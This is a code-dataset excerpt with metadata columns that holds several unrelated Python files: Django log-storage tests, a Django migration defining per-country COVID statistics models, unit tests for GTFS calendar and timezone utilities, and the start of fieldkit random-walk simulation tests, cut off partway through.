| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
bc3741ae59723e743ecd5a9b041ebac17e32bcf0
| 3,235
|
py
|
Python
|
log_storage/tests.py
|
Virtualstock/log_storage
|
cebc78263008d626ae732330dd61517e00101c0b
|
[
"MIT"
] | 1
|
2018-10-10T08:59:23.000Z
|
2018-10-10T08:59:23.000Z
|
log_storage/tests.py
|
Virtualstock/log_storage
|
cebc78263008d626ae732330dd61517e00101c0b
|
[
"MIT"
] | 3
|
2019-05-23T12:42:43.000Z
|
2021-02-09T12:28:04.000Z
|
log_storage/tests.py
|
Virtualstock/log_storage
|
cebc78263008d626ae732330dd61517e00101c0b
|
[
"MIT"
] | 1
|
2018-10-10T08:14:51.000Z
|
2018-10-10T08:14:51.000Z
|
# -*- coding: UTF-8 -*-
import logging
import django.test as unittest
from log_storage.models import Log
class TestLogRecordingToFile(unittest.TestCase):
def setUp(self):
self.log = Log(save_file=True)
self.logger = logging.getLogger("test." + __name__)
self.logger.setLevel(logging.DEBUG)
def test_logging(self):
with self.log:
self.logger.info("info")
self.logger.debug("debug")
self.assertIn(u"info", self.log.log_data)
self.assertIn(u"debug", self.log.log_data)
self.assertIn(u"test.log_storage.tests", self.log.log_data)
def test_persistence(self):
with self.log:
self.logger.info("info")
self.logger.debug("debug")
self.log = Log.objects.get(pk=self.log.pk)
self.assertIn(u"info", self.log.log_data)
self.assertIn(u"debug", self.log.log_data)
self.assertIn(u"test.log_storage.tests", self.log.log_data)
def test_persistence_backward_compatibility(self):
with self.log:
self.logger.info("info")
self.logger.debug("debug")
self.log = Log.objects.get(pk=self.log.pk)
self.assertTrue(self.log.filename.startswith("logs/"))
self.log.filename = self.log.filename[5:]
self.assertIn(u"info", self.log.log_data)
self.assertIn(u"debug", self.log.log_data)
self.assertIn(u"test.log_storage.tests", self.log.log_data)
def test_log_data(self):
"""Test that calling log.log_data before logging anything won't throw error."""
self.assertEqual("", self.log.log_data)
def test_logging_unicode(self):
with self.log:
self.logger.info(u"инфо")
self.logger.debug(u"дебуг")
self.log = Log.objects.get(pk=self.log.pk)
self.assertIn(u"инфо", self.log.log_data)
self.assertIn(u"дебуг", self.log.log_data)
class TestLogRecordingToDb(unittest.TestCase):
def setUp(self):
self.log = Log(save_file=False)
self.logger = logging.getLogger("test." + __name__)
self.logger.setLevel(logging.DEBUG)
def test_logging(self):
with self.log:
self.logger.info("info")
self.logger.debug("debug")
self.assertIn(u"info", self.log.log_data)
self.assertIn(u"debug", self.log.log_data)
self.assertIn(u"test.log_storage.tests", self.log.log_data)
def test_persistence(self):
with self.log:
self.logger.info("info")
self.logger.debug("debug")
self.log = Log.objects.get(pk=self.log.pk)
self.assertIn(u"info", self.log.log_data)
self.assertIn(u"debug", self.log.log_data)
self.assertIn(u"test.log_storage.tests", self.log.log_data)
def test_log_data(self):
"""Test that calling log.log_data before logging anything won't throw error."""
self.assertEqual("", self.log.log_data)
def test_logging_unicode(self):
with self.log:
self.logger.info(u"инфо")
self.logger.debug(u"дебуг")
self.log = Log.objects.get(pk=self.log.pk)
self.assertIn(u"инфо", self.log.log_data)
self.assertIn(u"дебуг", self.log.log_data)
| 35.549451
| 87
| 0.632767
| 451
| 3,235
| 4.419069
| 0.128603
| 0.151029
| 0.140492
| 0.147516
| 0.884596
| 0.884596
| 0.884596
| 0.884596
| 0.884596
| 0.884596
| 0
| 0.000802
| 0.228748
| 3,235
| 90
| 88
| 35.944444
| 0.797996
| 0.05255
| 0
| 0.859155
| 0
| 0
| 0.082187
| 0.036018
| 0
| 0
| 0
| 0
| 0.309859
| 1
| 0.15493
| false
| 0
| 0.042254
| 0
| 0.225352
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb292478e32043cbbbdc08a000de11525a6de8dd
| 4,769
|
py
|
Python
|
app/core/migrations/0014_basecountrystats_chinacovidstats_francecovidstats_germanycovidstats_irancovidstats_italycovidstats_r.py
|
mzs9540/covid19
|
efe8b6e243f576f728a91fc5cde00b1ac0990ac1
|
[
"MIT"
] | 1
|
2020-04-27T15:20:15.000Z
|
2020-04-27T15:20:15.000Z
|
app/core/migrations/0014_basecountrystats_chinacovidstats_francecovidstats_germanycovidstats_irancovidstats_italycovidstats_r.py
|
mzs9540/covid19
|
efe8b6e243f576f728a91fc5cde00b1ac0990ac1
|
[
"MIT"
] | null | null | null |
app/core/migrations/0014_basecountrystats_chinacovidstats_francecovidstats_germanycovidstats_irancovidstats_italycovidstats_r.py
|
mzs9540/covid19
|
efe8b6e243f576f728a91fc5cde00b1ac0990ac1
|
[
"MIT"
] | 1
|
2020-05-30T13:55:22.000Z
|
2020-05-30T13:55:22.000Z
|
# Generated by Django 3.0.5 on 2020-04-29 10:01
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0013_auto_20200429_0516'),
]
operations = [
migrations.CreateModel(
name='BaseCountryStats',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('confirmed', models.IntegerField()),
('recovered', models.IntegerField()),
('deaths', models.IntegerField()),
],
),
migrations.CreateModel(
name='ChinaCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='FranceCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='GermanyCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='IranCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='ItalyCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='RussiaCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='SpainCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='TurkeyCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='UKCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='UkraineCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
migrations.CreateModel(
name='UsCovidStats',
fields=[
('basecountrystats_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='core.BaseCountryStats')),
],
bases=('core.basecountrystats',),
),
]
| 46.754902
| 208
| 0.613965
| 428
| 4,769
| 6.698598
| 0.151869
| 0.153471
| 0.058598
| 0.092082
| 0.808162
| 0.808162
| 0.797
| 0.797
| 0.797
| 0.797
| 0
| 0.008757
| 0.257706
| 4,769
| 101
| 209
| 47.217822
| 0.80113
| 0.009436
| 0
| 0.736842
| 1
| 0
| 0.195256
| 0.102711
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.021053
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cb6d81ab55f4eb87990716d2cb15855f9af586ec
| 24,509
|
py
|
Python
|
utilities/test/test_temporal_utils.py
|
MobilityData/mobility-database-interface
|
c6eb62b09e4784219c1d02e9f7cb88f77beaa2d8
|
[
"Apache-2.0"
] | 4
|
2021-03-12T10:40:47.000Z
|
2022-01-11T10:56:53.000Z
|
utilities/test/test_temporal_utils.py
|
MobilityData/mobility-database-interface
|
c6eb62b09e4784219c1d02e9f7cb88f77beaa2d8
|
[
"Apache-2.0"
] | 181
|
2021-03-09T15:27:51.000Z
|
2022-01-31T15:25:28.000Z
|
utilities/test/test_temporal_utils.py
|
MobilityData/mobility-database-interface
|
c6eb62b09e4784219c1d02e9f7cb88f77beaa2d8
|
[
"Apache-2.0"
] | null | null | null |
from datetime import datetime
import pandas as pd
from unittest import TestCase, mock
from unittest.mock import MagicMock, PropertyMock
from gtfs_kit.feed import Feed
from utilities.temporal_utils import *
class TestTemporalUtils(TestCase):
@mock.patch("gtfs_kit.feed.Feed")
def test_get_gtfs_date_by_type_with_dataset_with_none_calendars_should_return_empty_dataframe(
self, mock_dataset
):
mock_calendar = PropertyMock(return_value=None)
mock_calendar_dates = PropertyMock(return_value=None)
mock_dataset.__class__ = Feed
type(mock_dataset).calendar = mock_calendar
type(mock_dataset).calendar_dates = mock_calendar_dates
mock_date_type = MagicMock()
mock_date_type.__class__ = str
mock_date_type.__str__.return_value = "test_type"
under_test = get_gtfs_dates_by_type(mock_dataset, str(mock_date_type))
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
mock_calendar.assert_called()
self.assertEqual(mock_calendar.call_count, 1)
mock_calendar_dates.assert_called()
self.assertEqual(mock_calendar_dates.call_count, 1)
mock_date_type.assert_not_called()
@mock.patch("gtfs_kit.feed.Feed")
def test_get_gtfs_date_by_type_with_none_date_type_and_calendar_dates_should_return_empty_dataframe(
self, mock_dataset
):
mock_calendar = PropertyMock(
return_value=pd.DataFrame(
{
"end_date": ["20201010"],
"monday": [0],
"tuesday": [0],
"wednesday": [0],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [0],
"service_id": ["test_service_id"],
}
)
)
mock_calendar_dates = PropertyMock(return_value=None)
mock_dataset.__class__ = Feed
type(mock_dataset).calendar = mock_calendar
type(mock_dataset).calendar_dates = mock_calendar_dates
under_test = get_gtfs_dates_by_type(mock_dataset, None)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
mock_calendar.assert_called()
self.assertEqual(mock_calendar.call_count, 1)
mock_calendar_dates.assert_called()
self.assertEqual(mock_calendar_dates.call_count, 1)
@mock.patch("gtfs_kit.feed.Feed")
def test_get_gtfs_date_by_type_with_invalid_type_and_none_calendar_dates_should_return_empty_frame(
self, mock_dataset
):
mock_calendar = PropertyMock(
return_value=pd.DataFrame(
{
"end_date": ["20201010"],
"monday": [0],
"tuesday": [0],
"wednesday": [0],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [0],
"service_id": ["test_service_id"],
}
)
)
mock_calendar_dates = PropertyMock(return_value=None)
mock_dataset.__class__ = Feed
type(mock_dataset).calendar = mock_calendar
type(mock_dataset).calendar_dates = mock_calendar_dates
mock_date_type = MagicMock()
mock_date_type.__class__ = str
mock_date_type.__str__.return_value = "invalid_type"
under_test = get_gtfs_dates_by_type(mock_dataset, str(mock_date_type))
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
mock_calendar.assert_called()
self.assertEqual(mock_calendar.call_count, 1)
mock_calendar_dates.assert_called()
self.assertEqual(mock_calendar_dates.call_count, 1)
@mock.patch("gtfs_kit.feed.Feed")
def test_get_gtfs_date_by_type_with_calendar_and_none_calendar_dates_should_return_dataframe(
self, mock_dataset
):
mock_calendar = PropertyMock(
return_value=pd.DataFrame(
{
"start_date": ["20201010"],
"monday": [0],
"tuesday": [0],
"wednesday": [0],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [0],
"service_id": ["test_service_id"],
}
)
)
mock_calendar_dates = PropertyMock(return_value=None)
mock_dataset.__class__ = Feed
type(mock_dataset).calendar = mock_calendar
type(mock_dataset).calendar_dates = mock_calendar_dates
mock_date_type = MagicMock()
mock_date_type.__class__ = str
mock_date_type.__str__.return_value = "start_date"
test_dataframe = pd.DataFrame(
{"service_id": ["test_service_id"], "date": ["20201010"]}
)
under_test = get_gtfs_dates_by_type(mock_dataset, str(mock_date_type))
self.assertIsInstance(under_test, pd.DataFrame)
self.assertEqual(
under_test["service_id"].all(), test_dataframe["service_id"].all()
)
self.assertEqual(under_test["date"].all(), test_dataframe["date"].all())
mock_calendar.assert_called()
self.assertEqual(mock_calendar.call_count, 2)
mock_calendar_dates.assert_called()
self.assertEqual(mock_calendar_dates.call_count, 1)
@mock.patch("gtfs_kit.feed.Feed")
def test_get_gtfs_date_by_type_with_calendar_dates_with_exception_1_should_return_dataframe(
self, mock_dataset
):
mock_calendar = PropertyMock(return_value=None)
mock_calendar_dates = PropertyMock(
return_value=pd.DataFrame(
{
"date": ["20201010"],
"exception_type": [1],
"service_id": ["test_service_id"],
}
)
)
mock_dataset.__class__ = Feed
type(mock_dataset).calendar = mock_calendar
type(mock_dataset).calendar_dates = mock_calendar_dates
mock_date_type = MagicMock()
mock_date_type.__class__ = str
mock_date_type.__str__.return_value = "start_date"
test_dataframe = pd.DataFrame(
{"service_id": ["test_service_id"], "date": ["20201010"]}
)
under_test = get_gtfs_dates_by_type(mock_dataset, str(mock_date_type))
self.assertIsInstance(under_test, pd.DataFrame)
self.assertEqual(
under_test["service_id"].all(), test_dataframe["service_id"].all()
)
self.assertEqual(under_test["date"].all(), test_dataframe["date"].all())
mock_calendar.assert_called()
self.assertEqual(mock_calendar.call_count, 1)
mock_calendar_dates.assert_called()
self.assertEqual(mock_calendar_dates.call_count, 2)
@mock.patch("gtfs_kit.feed.Feed")
def test_get_gtfs_date_by_type_with_calendar_dates_with_exception_2_should_return_empty_dataframe(
self, mock_dataset
):
mock_calendar = PropertyMock(
return_value=pd.DataFrame(
{
"end_date": ["20201010"],
"monday": [0],
"tuesday": [0],
"wednesday": [0],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [0],
"service_id": ["test_service_id"],
}
)
)
mock_calendar_dates = PropertyMock(
return_value=pd.DataFrame(
{
"date": ["20201010"],
"exception_type": [2],
"service_id": ["test_service_id"],
}
)
)
mock_dataset.__class__ = Feed
type(mock_dataset).calendar = mock_calendar
type(mock_dataset).calendar_dates = mock_calendar_dates
mock_date_type = MagicMock()
mock_date_type.__class__ = str
mock_date_type.__str__.return_value = "end_date"
under_test = get_gtfs_dates_by_type(mock_dataset, str(mock_date_type))
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
mock_calendar.assert_called()
self.assertEqual(mock_calendar.call_count, 2)
mock_calendar_dates.assert_called()
self.assertEqual(mock_calendar_dates.call_count, 2)
def test_get_gtfs_start_dates_from_calendar_with_empty_calendar_should_return_empty_dataframe(
self,
):
test_calendar = pd.DataFrame(
{
"start_date": [],
"monday": [],
"tuesday": [],
"wednesday": [],
"thursday": [],
"friday": [],
"saturday": [],
"sunday": [],
"service_id": [],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
under_test = get_gtfs_start_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
def test_get_gtfs_start_dates_from_calendar_with_filled_calendar_should_return_non_empty_dataframe(
self,
):
test_calendar = pd.DataFrame(
{
"start_date": ["20201010"],
"monday": [1],
"tuesday": [1],
"wednesday": [1],
"thursday": [1],
"friday": [1],
"saturday": [1],
"sunday": [1],
"service_id": ["test_service_date"],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
test_service_ids_list = [
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
]
test_dates_list = [
"20201012",
"20201013",
"20201014",
"20201015",
"20201016",
"20201010",
"20201011",
]
under_test = get_gtfs_start_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertEqual(under_test["service_id"].count(), 7)
self.assertEqual(under_test["service_id"].tolist(), test_service_ids_list)
self.assertEqual(under_test["date"].count(), 7)
self.assertEqual(under_test["date"].tolist(), test_dates_list)
def test_get_gtfs_start_dates_from_calendar_with_mixed_calendar_should_return_non_empty_dataframe(
self,
):
test_calendar = pd.DataFrame(
{
"start_date": ["20201010"],
"monday": [1],
"tuesday": [1],
"wednesday": [1],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [1],
"service_id": ["test_service_date"],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
test_service_ids_list = [
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
]
test_dates_list = ["20201012", "20201013", "20201014", "20201010", "20201011"]
under_test = get_gtfs_start_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertEqual(under_test["service_id"].count(), 5)
self.assertEqual(under_test["service_id"].tolist(), test_service_ids_list)
self.assertEqual(under_test["date"].count(), 5)
self.assertEqual(under_test["date"].tolist(), test_dates_list)
def test_get_gtfs_start_dates_from_calendar_with_invalid_date(
self,
):
test_calendar = pd.DataFrame(
{
"start_date": ["invalid_date"],
"monday": [1],
"tuesday": [1],
"wednesday": [1],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [1],
"service_id": ["test_service_date"],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
under_test = get_gtfs_start_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
test_calendar = pd.DataFrame(
{
"start_date": [1],
"monday": [1],
"tuesday": [1],
"wednesday": [1],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [1],
"service_id": ["test_service_date"],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
under_test = get_gtfs_start_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
def test_get_gtfs_end_dates_from_calendar_with_empty_calendar_should_return_empty_dataframe(
self,
):
test_calendar = pd.DataFrame(
{
"end_date": [],
"monday": [],
"tuesday": [],
"wednesday": [],
"thursday": [],
"friday": [],
"saturday": [],
"sunday": [],
"service_id": [],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
under_test = get_gtfs_end_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
def test_get_gtfs_end_dates_from_calendar_with_filled_calendar_should_return_non_empty_dataframe(
self,
):
test_calendar = pd.DataFrame(
{
"end_date": ["20201010"],
"monday": [1],
"tuesday": [1],
"wednesday": [1],
"thursday": [1],
"friday": [1],
"saturday": [1],
"sunday": [1],
"service_id": ["test_service_date"],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
test_service_ids_list = [
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
]
test_dates_list = [
"20201005",
"20201006",
"20201007",
"20201008",
"20201009",
"20201010",
"20201004",
]
under_test = get_gtfs_end_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertEqual(under_test["service_id"].count(), 7)
self.assertEqual(under_test["service_id"].tolist(), test_service_ids_list)
self.assertEqual(under_test["date"].count(), 7)
self.assertEqual(under_test["date"].tolist(), test_dates_list)
def test_get_gtfs_end_dates_from_calendar_with_mixed_calendar_should_return_non_empty_dataframe(
self,
):
test_calendar = pd.DataFrame(
{
"end_date": ["20201010"],
"monday": [1],
"tuesday": [1],
"wednesday": [1],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [1],
"service_id": ["test_service_date"],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
test_service_ids_list = [
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
"test_service_date",
]
test_dates_list = ["20201005", "20201006", "20201007", "20201010", "20201004"]
under_test = get_gtfs_end_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertEqual(under_test["service_id"].count(), 5)
self.assertEqual(under_test["service_id"].tolist(), test_service_ids_list)
self.assertEqual(under_test["date"].count(), 5)
self.assertEqual(under_test["date"].tolist(), test_dates_list)
def test_get_gtfs_end_dates_from_calendar_with_invalid_date(
self,
):
test_calendar = pd.DataFrame(
{
"end_date": ["invalid_date"],
"monday": [1],
"tuesday": [1],
"wednesday": [1],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [1],
"service_id": ["test_service_date"],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
under_test = get_gtfs_end_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
test_calendar = pd.DataFrame(
{
"end_date": [1],
"monday": [1],
"tuesday": [1],
"wednesday": [1],
"thursday": [0],
"friday": [0],
"saturday": [1],
"sunday": [1],
"service_id": ["test_service_date"],
}
)
mock_calendar = MagicMock()
mock_calendar.__class__ = pd.DataFrame
mock_calendar.iterrows.return_value = test_calendar.iterrows()
test_dataframe = pd.DataFrame(columns=["service_id", "date"])
under_test = get_gtfs_end_dates_from_calendar(mock_calendar, test_dataframe)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue(under_test.empty)
@mock.patch("gtfs_kit.feed.Feed")
def test_get_gtfs_timezone_utc_offset_with_invalid_agency_timezone_should_return_default_utc_offset(
self, mock_dataset
):
mock_agency = PropertyMock(
return_value=pd.DataFrame({"agency_timezone": [" test_timezone"]})
)
mock_dataset.__class__ = Feed
type(mock_dataset).agency = mock_agency
test_utc_offset = ""
under_test = get_gtfs_timezone_utc_offset(mock_dataset)
self.assertEqual(under_test, test_utc_offset)
mock_agency = PropertyMock(return_value=pd.DataFrame({"agency_timezone": [0]}))
mock_dataset.__class__ = Feed
type(mock_dataset).agency = mock_agency
test_utc_offset = ""
under_test = get_gtfs_timezone_utc_offset(mock_dataset)
self.assertEqual(under_test, test_utc_offset)
@mock.patch("gtfs_kit.feed.Feed")
def test_get_gtfs_timezone_utc_offset_with_valid_agency_timezone_should_return_timezone_utc_offset(
self, mock_dataset
):
mock_agency = PropertyMock(
return_value=pd.DataFrame({"agency_timezone": ["America/Toronto"]})
)
mock_dataset.__class__ = Feed
type(mock_dataset).agency = mock_agency
test_utc_offset = ["-05:00", "-04:00"]
under_test = get_gtfs_timezone_utc_offset(mock_dataset)
self.assertTrue(under_test in test_utc_offset)
@mock.patch("gtfs_kit.feed.Feed")
def test_get_gtfs_timezone_utc_offset_with_another_agency_timezone_should_return_timezone_utc_offset(
self, mock_dataset
):
mock_agency = PropertyMock(
return_value=pd.DataFrame({"agency_timezone": ["Europe/London"]})
)
mock_dataset.__class__ = Feed
type(mock_dataset).agency = mock_agency
test_utc_offset = ["±00:00", "+01:00"]
under_test = get_gtfs_timezone_utc_offset(mock_dataset)
self.assertTrue(under_test in test_utc_offset)
@mock.patch("gtfs_kit.feed.Feed")
def test_gtfs_stop_times_for_date_with_valid_parameters_should_return_stop_times_dataframe(
self, mock_dataset
):
test_stop_times_trip_ids = ["test_trip_id"]
test_stop_times_departure_time = ["05:00:00"]
test_stop_time_key = "departure_time"
mock_trips = PropertyMock(
return_value=pd.DataFrame(
{"service_id": ["test_service_id"], "trip_id": ["test_trip_id"]}
)
)
mock_stop_times = PropertyMock(
return_value=pd.DataFrame(
{"trip_id": ["test_trip_id"], "departure_time": ["05:00:00"]}
)
)
mock_dataset.__class__ = Feed
type(mock_dataset).trips = mock_trips
type(mock_dataset).stop_times = mock_stop_times
test_dataset_dates = pd.DataFrame(
{
"service_id": [
"test_service_id",
"test_service_id",
"test_service_id",
"test_service_id",
"test_service_id",
"test_service_id",
"test_service_id",
],
"date": [
"20201005",
"20201006",
"20201007",
"20201008",
"20201009",
"20201010",
"20201004",
],
}
)
mock_dataset_dates = MagicMock()
mock_dataset_dates.__class__ = pd.DataFrame
mock_dataset_dates.__getitem__.side_effect = test_dataset_dates.__getitem__
mock_dataset_dates.loc.__getitem__.side_effect = (
test_dataset_dates.loc.__getitem__
)
mock_dataset_dates.items.return_value = test_dataset_dates.items()
mock_date_to_look_up = MagicMock()
mock_date_to_look_up.__class__ = datetime
mock_date_to_look_up.strftime.return_value = "20201010"
under_test = get_gtfs_stop_times_for_date(
mock_dataset, mock_dataset_dates, mock_date_to_look_up, test_stop_time_key
)
self.assertIsInstance(under_test, pd.DataFrame)
self.assertTrue("trip_id" in under_test.columns)
self.assertTrue("departure_time" in under_test.columns)
self.assertEqual(under_test["trip_id"].tolist(), test_stop_times_trip_ids)
self.assertEqual(
under_test["departure_time"].tolist(), test_stop_times_departure_time
)
| 36.745127
| 105
| 0.580399
| 2,510
| 24,509
| 5.188446
| 0.049801
| 0.081087
| 0.032097
| 0.036858
| 0.926207
| 0.895723
| 0.885357
| 0.873148
| 0.869001
| 0.859479
| 0
| 0.029183
| 0.313517
| 24,509
| 666
| 106
| 36.8003
| 0.744785
| 0
| 0
| 0.737815
| 0
| 0
| 0.123669
| 0
| 0
| 0
| 0
| 0
| 0.134454
| 1
| 0.030252
| false
| 0
| 0.010084
| 0
| 0.042017
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cbc02d8e8ef316f961ec52af60742ab843058e71
| 16,602
|
py
|
Python
|
fieldkit/test/test_simulate.py
|
djz332/fieldkit
|
3c242c2026e80100cdd6b2114d72a61122381fcd
|
[
"BSD-3-Clause"
] | null | null | null |
fieldkit/test/test_simulate.py
|
djz332/fieldkit
|
3c242c2026e80100cdd6b2114d72a61122381fcd
|
[
"BSD-3-Clause"
] | null | null | null |
fieldkit/test/test_simulate.py
|
djz332/fieldkit
|
3c242c2026e80100cdd6b2114d72a61122381fcd
|
[
"BSD-3-Clause"
] | null | null | null |
""" Unit tests for fieldkit.simulate
"""
import unittest
import numpy as np
import fieldkit
class RandomWalkTest(unittest.TestCase):
""" Test cases for :py:class:`~fieldkit.simulate.random_walk`
"""
def test_one_step(self):
""" Test simple random walk rules for one step.
"""
mesh = fieldkit.Mesh().from_lattice(N=3, lattice=fieldkit.HOOMDLattice(L=3.0))
field = fieldkit.Field(mesh).from_array(np.ones(mesh.shape))
field[:,:,0] = 0
domain = fieldkit.domain.digitize(field, threshold=0.5)
traj,x,im = fieldkit.simulate.random_walk(domain, N=2, steps=1, runs=10)
# check shape of output is OK
self.assertEqual(traj.shape, (10,2,3))
self.assertEqual(x.shape, (2,3))
self.assertEqual(im.shape, (2,3))
# check that all coords are still in box
self.assertTrue(np.all(x >= 0))
self.assertTrue(np.all(x < 3))
# walk cannot enter z = 0
self.assertTrue(np.all(traj[:,:,2] != 0))
# with 10 steps, a particle cannot have traveled more than 3 images
